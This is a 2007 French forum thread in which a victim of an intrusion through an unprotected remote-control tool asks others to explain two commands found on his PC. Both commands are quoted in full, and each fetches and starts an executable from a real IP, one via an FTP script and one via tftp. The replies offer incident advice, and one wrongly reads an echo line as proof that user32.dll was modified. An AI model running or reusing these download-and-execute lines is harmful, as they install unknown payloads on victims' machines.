Tchoumak Posté(e) le 1 mai 2007 Partager Posté(e) le 1 mai 2007 Bonjour à tous, J'avais installé il y a quelque temps un outils permettant de prendre le controle de mon PC a distance, et malin comme je suis j'ai oublié de le désinstaller :( Du coup ce matin j'ai vu des fenetres s'ouvrir toutes seuls, et lorsque j'ai regardé mon historique de la commande "executer", voici ce que j'ai trouvé : cmd.exe /c del i&echo open 82.225.22.145 25276 > i&echo user 1 1 >> i &echo get 671.exe >> i &echo quit >> i &ftp -n -s:i &671.exe&del i&exit et %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 69.157.107.38 GET xkmgsaf.exe & start xkmgsaf& Je m'en suis apercu a ce moment la, et j'ai tout bloqué, puis désactivé mon outils de controle a distance... Quelqu'un saurais décrypter ce que le hackeur a voulu faire ? Merci d'avance ! Lien vers le commentaire Partager sur d’autres sites More sharing options...
gougou59 Posté(e) le 1 mai 2007 Partager Posté(e) le 1 mai 2007 Il a voulu récupérer un fichier (671.exe) sur un ftp (82.225.22.145 25276) et l'exécuter... Pour la 2ème commande, je ne sais pas. Quelqu'un d'autre que vous à eu exactement le même soucis il y a quelques semaines!! On ne saurait trop le rappeler... Quand on installe un logiciel de prise de controle à distance, protegez le au moins par un mot de passe (complexe)!!! Lien vers le commentaire Partager sur d’autres sites More sharing options...
Tintaspi Posté(e) le 1 mai 2007 Partager Posté(e) le 1 mai 2007 Hum, c'est plus du windows que du réseau, mais bon... -Pour la première on dirait qu'il ouvre une connection pour télécharger un binaire windows et l'execute (surement un trojan ou autre...). -Pour la deuxième on dirait qu'il fait la même chose mais d'une façon différente (et un autre bianire) Lien vers le commentaire Partager sur d’autres sites More sharing options...
Amour Posté(e) le 1 mai 2007 Partager Posté(e) le 1 mai 2007 Attention l'IP en question est un abonné Free mne69-3-82-225-22-145.fbx.proxad.net (c'est à Lyon) Envoyez de suite un mail à abuse@free.fr en expliquant tout, le type va se faire calmer... Lien vers le commentaire Partager sur d’autres sites More sharing options...
kyro Posté(e) le 1 mai 2007 Partager Posté(e) le 1 mai 2007 C'est Amour qui a fais ca , il habite a Lyon Lien vers le commentaire Partager sur d’autres sites More sharing options...
Krapace Posté(e) le 1 mai 2007 Partager Posté(e) le 1 mai 2007 Attention l'IP en question est un abonné Free mne69-3-82-225-22-145.fbx.proxad.net (c'est à Lyon)Envoyez de suite un mail à abuse@free.fr en expliquant tout, le type va se faire calmer... Ca peut aussi etre un bot ... Lien vers le commentaire Partager sur d’autres sites More sharing options...
Tchoumak Posté(e) le 1 mai 2007 Auteur Partager Posté(e) le 1 mai 2007 Merci à tous pour vos réponses... Je vais effectivement envoyer un mail à Free, on ne sais jamais Sinon comment puis-je savoir si j'ai actuellement des ports ouverts ? J'ai le firewall de windows qui s'est déclenché, mais peut etre que ce n'est pas le meilleur... vous pourriez m'en recommander un (de preference gratuit) :) Lien vers le commentaire Partager sur d’autres sites More sharing options...
Krapace Posté(e) le 2 mai 2007 Partager Posté(e) le 2 mai 2007 Zone Alarm Free Lien vers le commentaire Partager sur d’autres sites More sharing options...
Amour Posté(e) le 2 mai 2007 Partager Posté(e) le 2 mai 2007 Attention l'IP en question est un abonné Free mne69-3-82-225-22-145.fbx.proxad.net (c'est à Lyon)Envoyez de suite un mail à abuse@free.fr en expliquant tout, le type va se faire calmer... Ca peut aussi etre un bot ... Aucune importance, il doit être prévenu qu'il est soit : - Infecté - Idiot @kyro : perdu, je suis sur PAR69, et lui sur MNE69 Lien vers le commentaire Partager sur d’autres sites More sharing options...
sugeek Posté(e) le 2 mai 2007 Partager Posté(e) le 2 mai 2007 Sinon comment puis-je savoir si j'ai actuellement des ports ouverts ? J'ai le firewall de windows qui s'est déclenché, mais peut etre que ce n'est pas le meilleur... vous pourriez m'en recommander un (de preference gratuit) :) cmd -> netstat -a -> liste des ports ouverts kerio personal firewall Lien vers le commentaire Partager sur d’autres sites More sharing options...
beuhbeuh Posté(e) le 2 mai 2007 Partager Posté(e) le 2 mai 2007 @kyro : perdu, je suis sur PAR69, et lui sur MNE69 HS : copain de NRA Lien vers le commentaire Partager sur d’autres sites More sharing options...
Tchoumak Posté(e) le 2 mai 2007 Auteur Partager Posté(e) le 2 mai 2007 On vient de me dire que dans sa tentative le hackeur a modifié une DLL système user32.dll, et que "c'est mort, si il a subilisé certaines DLL systemes, tu pourras utiliser n'importe quel logiciel de securité, son fonctionnement sera faussé parce que le systeme n'interpretera pas les commandes correctement, puisque le fonctionnement du coeur du systeme est altéré" Qu'en pensez vous ? Lien vers le commentaire Partager sur d’autres sites More sharing options...
sugeek Posté(e) le 2 mai 2007 Partager Posté(e) le 2 mai 2007 je ne sais pas puisque je n'ai pas d information sur le temps entre ca commande et la coupure du logiciel de partage. Dans le doute tu format Lien vers le commentaire Partager sur d’autres sites More sharing options...
sky25 Posté(e) le 2 mai 2007 Partager Posté(e) le 2 mai 2007 tu peux toujours essayer de passer ta freebox en mode routeur :) ( avec les modifications que cela entraine - ouverture de ports etc ... ) ainsi les tentatives de piratages via trojan etc .. n'aboutiront pas Lien vers le commentaire Partager sur d’autres sites More sharing options...
sugeek Posté(e) le 2 mai 2007 Partager Posté(e) le 2 mai 2007 tu peux toujours essayer de passer ta freebox en mode routeur :) ( avec les modifications que cela entraine - ouverture de ports etc ... )ainsi les tentatives de piratages via trojan etc .. n'aboutiront pas sauf si les port du vnc like sont ouvert pour pouvoir le prendre depuis internet au quel ca bah ca revien au meme mais bon c clair mode router on ! always ! Lien vers le commentaire Partager sur d’autres sites More sharing options...
Tchoumak Posté(e) le 2 mai 2007 Auteur Partager Posté(e) le 2 mai 2007 Je suis déjà en mode routeur... Je pense que now vu que le VNC server est désinstallé je crains plus rien de ce coté la, c'est au niveau des modifs qu'il a fait que ca me fait peur. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Eagle1 Posté(e) le 2 mai 2007 Partager Posté(e) le 2 mai 2007 met toi un firewall logiciel et tu sera tranquil.... Lien vers le commentaire Partager sur d’autres sites More sharing options...
_Iam-Nap_ Posté(e) le 2 mai 2007 Partager Posté(e) le 2 mai 2007 %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 69.157.107.38 GET xkmgsaf.exe & start xkmgsaf& Reparation par redondance du user32.dll et injection 'xkmgsaf.exe' avec démarrage du ledit xkmgsaf.exe .... Bref il a bien trafiqué ta dll par un truc concocté par lui (xkmgsaf.exe, même sur google il n'y a pas de référence à cet exe ...) donc si j'etait toi ... format ou reparation de la partition windows Lien vers le commentaire Partager sur d’autres sites More sharing options...
Tintaspi Posté(e) le 2 mai 2007 Partager Posté(e) le 2 mai 2007 Euh j'y connais rien "script" windows, mais "echo Repairing user32.dll" ça ne fait pas qu'afficher "Repairing user32.dll" ? Lien vers le commentaire Partager sur d’autres sites More sharing options...
Tchoumak Posté(e) le 2 mai 2007 Auteur Partager Posté(e) le 2 mai 2007 Pas moyen de remettre la DLL d'origine ? en la copiant à partir d'un autre PC par exemple ? Lien vers le commentaire Partager sur d’autres sites More sharing options...
Messages recommandés
Archivé
Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.